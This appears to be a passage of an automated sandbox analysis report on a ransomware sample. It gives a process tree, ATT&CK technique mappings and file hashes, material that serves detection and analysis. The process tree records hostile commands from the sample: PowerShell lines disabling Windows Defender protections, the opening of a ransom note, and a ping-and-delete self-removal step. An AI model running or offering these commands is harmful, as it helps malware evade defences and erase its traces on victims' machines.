C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4412

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:3080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3832

C:\Windows\SysWOW64\notepad.exe
notepad.exe C:\EGdu_HOW_TO_DECRYPT.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:4200

C:\Windows\SysWOW64\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
2⤵
PID:4420

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 5 127.0.0.1
3⤵
- Runs ping.exe
PID:2988

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
PID:1032

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1436

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb591c46f8,0x7ffb591c4708,0x7ffb591c4718
2⤵
PID:1960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
2⤵
PID:1164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
2⤵
PID:4100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
2⤵
PID:2128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
2⤵
PID:2780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
2⤵
PID:4212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
2⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
PID:3908

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
2⤵
PID:4812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
2⤵
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3856 /prefetch:8
2⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5248 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
2⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
2⤵
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
2⤵
PID:644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
2⤵
PID:1776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
2⤵
PID:3344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
2⤵
PID:2568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
2⤵
PID:4988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
2⤵
PID:1204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3928 /prefetch:8
2⤵
PID:4644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6388 /prefetch:8
2⤵
PID:4152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812

C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.0.10.exe
"C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.0.10.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4960

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2128

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2544

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.0.1955343806\1922704070" -parentBuildID 20240213172118 -prefsHandle 2628 -prefMapHandle 2620 -prefsLen 19246 -prefMapSize 243693 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a3e5f1fb-f86d-4eeb-809e-47ad98228391} 2544 gpu
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:812

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.1.1553113611\430771601" -childID 1 -isForBrowser -prefsHandle 2460 -prefMapHandle 2484 -prefsLen 20081 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {f22d7dca-3f36-4648-bb06-7027494c9457} 2544 tab
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2964

C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:243d79b3c2b3e54c60fab5522f84a92f3afae2515a670c92e66bfecb8b +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 2544 DisableNetwork 1
5⤵
- Executes dropped EXE
PID:1664

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.2.641922402\1480071018" -childID 2 -isForBrowser -prefsHandle 3436 -prefMapHandle 3444 -prefsLen 20895 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ffe66845-d923-4da3-8d88-1bf57e026721} 2544 tab
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1376

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.3.1140952129\1048137353" -childID 3 -isForBrowser -prefsHandle 3508 -prefMapHandle 3504 -prefsLen 20972 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {f2ad8511-4e8d-49b5-9682-5fde38bd97e1} 2544 tab
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4332

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.4.759345266\1176335806" -parentBuildID 20240213172118 -prefsHandle 3300 -prefMapHandle 3324 -prefsLen 22147 -prefMapSize 243693 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {aafdf0d8-cb88-41bd-a818-7cb0ac2adace} 2544 rdd
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4184

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.5.135887067\276058102" -childID 4 -isForBrowser -prefsHandle 4076 -prefMapHandle 4072 -prefsLen 22301 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {80aa3cb4-a4a8-4274-a500-3193b6c98ce7} 2544 tab
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5464

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.6.629077488\1554047327" -childID 5 -isForBrowser -prefsHandle 4312 -prefMapHandle 4316 -prefsLen 22396 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e1a97747-925b-47d1-a12c-25d9c503c0ff} 2544 tab
5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5612

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.7.46172432\180703905" -childID 6 -isForBrowser -prefsHandle 4480 -prefMapHandle 4488 -prefsLen 22426 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8e51e875-39be-4505-ba12-1d2db3a722ea} 2544 tab
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5680

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.8.1137298489\1785427632" -childID 7 -isForBrowser -prefsHandle 4956 -prefMapHandle 4656 -prefsLen 23072 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8df5aa47-10d5-412d-a082-c899f68d2983} 2544 tab
5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1184

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.9.153346449\940560639" -childID 8 -isForBrowser -prefsHandle 2984 -prefMapHandle 3448 -prefsLen 23188 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {9d539721-62c0-46cb-b22c-6aca23ab4da0} 2544 tab
5⤵
- Executes dropped EXE
PID:1828

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.10.526501712\763908496" -childID 9 -isForBrowser -prefsHandle 5204 -prefMapHandle 5200 -prefsLen 23188 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2bfae859-d23f-47b3-9c1a-f3858989983f} 2544 tab
5⤵
- Executes dropped EXE
PID:5348

C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="2544.11.473647586\1556290735" -childID 10 -isForBrowser -prefsHandle 4104 -prefMapHandle 4288 -prefsLen 23312 -prefMapSize 243693 -jsInitHandle 1288 -jsInitLen 240916 -parentBuildID 20240213172118 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {3d970cf2-09b3-44f2-90e1-2f4ffa33ad88} 2544 tab
5⤵
- Executes dropped EXE
PID:5720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,1109875346871969074,3424507566470419691,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:1
2⤵
PID:4392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4588

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\EGdu_HOW_TO_DECRYPT.txt
Filesize
1KB

MD5
4e68cfad3f3cbef5406c90fd9e9d7931

SHA1
504d53957bbed8e1a612c791eec7abdd17bd15bc

SHA256
51dc299391f9b3eca411936a0d01781ad68799d282655e0d20c8c8521aa8e014

SHA512
78c89847c3a7c128e5d54c3fff0e41c89a61722730b9d02d9c7e0b6985ce8188c3c37b6357a71c30f7e34c8b78f94599a186be6c189e56f6ccb832033e77172a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
e0811105475d528ab174dfdb69f935f3

SHA1
dd9689f0f70a07b4e6fb29607e42d2d5faf1f516

SHA256
c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c

SHA512
8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
47b2c6613360b818825d076d14c051f7

SHA1
7df7304568313a06540f490bf3305cb89bc03e5c

SHA256
47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac

SHA512
08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4dbd99ec-253a-41c0-ab4f-3d4cf74127fa.tmp
Filesize
7KB

MD5
a83436c597508271cfc372d15e15192d

SHA1
ae31d79d9a2c76b36ac8904f3ca5bffd4d365203

SHA256
2504b8764d9886aac744137957c638b5fdf21e496a166d126b4afee662b63ceb

SHA512
2365f21910405462cff9f5bba9e0b1043a8858a3b44f853cf6f533be9f015fca55291d046debbdb5e79ddee53d900cdb377fb48c93bec8414ec62cae13ab7134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
f9b87049e7940bc031b609e909f2fc6d

SHA1
2804b110dc86ec1e6229ef2bcea0cc4d9f2f1e7a

SHA256
e6f54e8ed7b64d72af79a52844171fb3f9d3d0ad56c94e8f12dd52d9162362ac

SHA512
7eaa2f240a719c6214741430249de9c542b63ce78759afcc0f46ef2fbc9da54e8f831db060c869fd72cdcead936ae3b7d94e207e2f24c75a8eb2f61fcd947aff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
550B

MD5
d6f0215aa7be01b809bfda61fd8dc4ab

SHA1
d9cf8347d406225d2574cd83c26b87df386616c9

SHA256
deb5a38cef5bc463afa0d7181eda69fb718d7ba78233edd948ded9852dd04115

SHA512
dab09e7b2d6d431cda04900566c27493d0fd98e5f82c76dc9ab376c730ca9ddbf04bd00c3a15d4cf6d1836d6e2581d5aa831e3876f5305afe1f7845fa2fc06a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
c09590b117dce808a05a0b9826846dd1

SHA1
6414813974a1712b2768b8f2274b81f2cc064e1b

SHA256
8270c38b89291035031479516a2d018e473c75aa84bea78a3e79ba3ccdbcdfe9

SHA512
f0f6f73aab7e8ba9345a4c1b873017500b172604eff6eb8fef915801574e559eec8929102909d639d8444b9f4b700cd7888239851533ec306fdde5c633c5ba6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
2c35f06578de5a2f328a3f2e7aa3d6dd

SHA1
342740c91f1b696e137bd830988b6cee654091b7

SHA256
1b47cf82c8dfe1fed61661afc4747d8a64d62582d5a9ba25f74b631ab43dacff

SHA512
48d0702250fd9b95d48cd8a74b48e3d5c61a0cc95ad63b241e434463893a327617954b6eac4fa6f275e0c52287091db6eb505803f6f06abcd3668e8ab422c15c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
874B

MD5
837f4869a8d8e65106d00421a8aeb0e3

SHA1
49356e501c65cc68241ed009a91bc7960662c6f9

SHA256
121f040fa330573fc6737bafbf51f89b1e735b848c9cc5e169a4b86511aa1c64

SHA512
d2a595ba31693fa9d8409ddeeb518f6e2df3170b5037217252f23af58187f859913734126ba9408c0d492bf986469a02ea23a9f096e5fba55cb4ec858d0735b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a5565.TMP
Filesize
706B

MD5
200b17788d741e353583e80757e2d0eb

SHA1
67794903e415ec038bc4914ab35bdb9ae15d7d59

SHA256
ef7e9ee1a057a20e5b9b79097061a4cc19cdaea014df2e002103fbbc5b441464

SHA512
8e8598229fd94de7e7a56167b6d325a468f05c7b19d106f637db922a2b82f1f44210bd3566cc2e557888289f80a88e9b723f5f64d818d5386f9f8af5e0436836

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

